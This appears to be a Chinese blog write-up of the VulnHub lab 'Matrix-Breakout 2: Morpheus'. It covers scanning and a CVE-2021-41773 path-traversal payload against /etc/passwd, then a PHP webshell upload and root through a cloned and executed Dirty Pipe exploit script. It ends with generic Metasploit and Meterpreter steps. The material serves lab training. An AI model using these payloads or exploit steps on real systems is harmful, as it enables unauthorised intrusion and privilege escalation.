【vulnhub靶场】MATRIX-BREAKOUT: 2 MORPHEUS

文章描述了一次模拟的渗透测试过程,从信息收集开始,包括网段扫描、二层和三层探测,发现了Apache和NGINX的潜在漏洞。尝试了基本认证的字典爆破和已知漏洞利用,然后通过文件上传进行后渗透测试,最终目标是权限提升至root。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


描述:

这是《黑客帝国》系列的第二部,副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity,试图调查尼布甲尼撒号上的一台电脑,Cypher把其他人都锁在了电脑之外,这台电脑拥有解开谜团的钥匙。

难度:中等难度

一、开启靶机

在这里插入图片描述
在这里插入图片描述

信息收集

使用net网卡,查看网段:

在这里插入图片描述
网段为:192.168.200.0/24

二层发现

netdiscover -i eth0 -r 192.168.200.0/24

在这里插入图片描述
192.168.200.1为物理机地址
192.168.200.2为net网卡网关
192.168.200.254为net网卡dhcp地址
靶机地址:192.168.200.134

三层探测

nmap -sV 192.168.200.134

在这里插入图片描述
扫描再次确认:
在这里插入图片描述
访问web:
查看指纹:
在这里插入图片描述
联想到basic认证:
在这里插入图片描述
在这里插入图片描述
basic认证:
在这里插入图片描述
目录枚举:
在这里插入图片描述
加上-r参数继续枚举

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
这个应该有东西
在这里插入图片描述
在这里插入图片描述
再用kali的字典枚举一次:
在这里插入图片描述
发现有刚刚没有找到的文件:
在这里插入图片描述
这里可能是一个突破口:
在这里插入图片描述

信息整理:

软件\系统版本历史漏洞
DebianDebian5(可能)linux:linux_kernel未知
opensshOpenSSH 8.4p1CVE-2020-15778(需要密码)
Apache2.4.51CVE-2021-41773(任意文件读取)
NGINX1.18.0CVE-2021-23017 CVE-2022-41742
basic未知暴力破解

初步攻击

basic爆破:

生成字典:
在这里插入图片描述

在这里插入图片描述
爆破没成功:
在这里插入图片描述

已知漏洞利用

使用apache漏洞利用:(失败)在目录爆破时已经注定失败

poc:
/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/etc/passwd

在这里插入图片描述
这里先放弃利用已知漏洞查看一下F12:

这里用了webrtc的api:
这里还有一张图片,之前忽略了她的存在:
在这里插入图片描述
使用工具看看里面有没有藏东西:
先记事本打开:
看样子里面有东西
在这里插入图片描述

丢到winhex中分析:
在这里插入图片描述
附带一些信息可能可能后面有用:
试一下刚刚找到的界面:
在这里插入图片描述
后面跟的文件名可能是一个文件写入点:

文件上传

给一个php一句话写入测试:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
查看用户:
在这里插入图片描述

后渗透测试

权限提升:
上传工具查找可以利用的提权漏洞:
https://github.com/carlospolop/PEASS-ng
查看存在漏洞利用:
在这里插入图片描述
在这里插入图片描述
使用脚本提权:

git clone https://github.com/imfiver/CVE-2022-0847.git
chmod 777 Dirty-Pipe.sh
bash Dirty-Pipe.sh

在这里插入图片描述

后渗透测试

修改root后我们进去开启root的登录权限:
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段,评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法: ### 1. 信息收集(Reconnaissance) 在开始渗透测试之前,首先需要进行信息收集。信息收集的目的是尽可能多地了解目标系统,包括操作系统类型、开放端口、服务版本等。 - **使用Nmap扫描端口**:Nmap是一个强大的网络扫描工具,可以扫描目标系统的开放端口和服务。 ```sh nmap -sS -sV -O <目标IP> ``` - **使用Nikto扫描Web漏洞**:Nikto是一个Web服务器扫描工具,可以扫描常见的Web漏洞。 ```sh nikto -h <目标IP> ``` ### 2. 漏洞扫描(Vulnerability Scanning) 在信息收集的基础上,进行漏洞扫描,识别系统中的已知漏洞。 - **使用OpenVAS进行漏洞扫描**:OpenVAS是一个开源的漏洞扫描工具,可以自动扫描系统中的漏洞。 ```sh openvas-scan <目标IP> ``` ### 3. 漏洞利用(Exploitation) 一旦识别出系统中的漏洞,就可以尝试利用这些漏洞来获取系统的访问权限。 - **使用Metasploit进行漏洞利用**:Metasploit是一个流行的渗透测试框架,提供了大量的漏洞利用模块。 ```sh msfconsole use exploit/<模块名称> set RHOST <目标IP> set PAYLOAD <有效载荷> exploit ``` ### 4. 权限提升(Privilege Escalation) 获取系统访问权限后,通常需要提升权限以获得更高的访问级别。 - **使用本地提权工具**:例如,Linux系统中的`sudo -l`命令可以查看当前用户可以执行的命令,Windows系统中的`whoami /priv`命令可以查看当前用户的权限。 ### 5. 后渗透操作(Post-Exploitation) 在获取系统权限后,可以进行后渗透操作,例如数据窃取、系统破坏等。 - **使用Meterpreter进行后渗透操作**:Meterpreter是Metasploit中的一个后渗透模块,提供了丰富的功能。 ```sh meterpreter > sysinfo meterpreter > download <文件路径> ``` ### 6. 报告(Reporting) 最后,生成渗透测试报告,详细记录测试过程中发现的问题和漏洞,并提出修复建议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值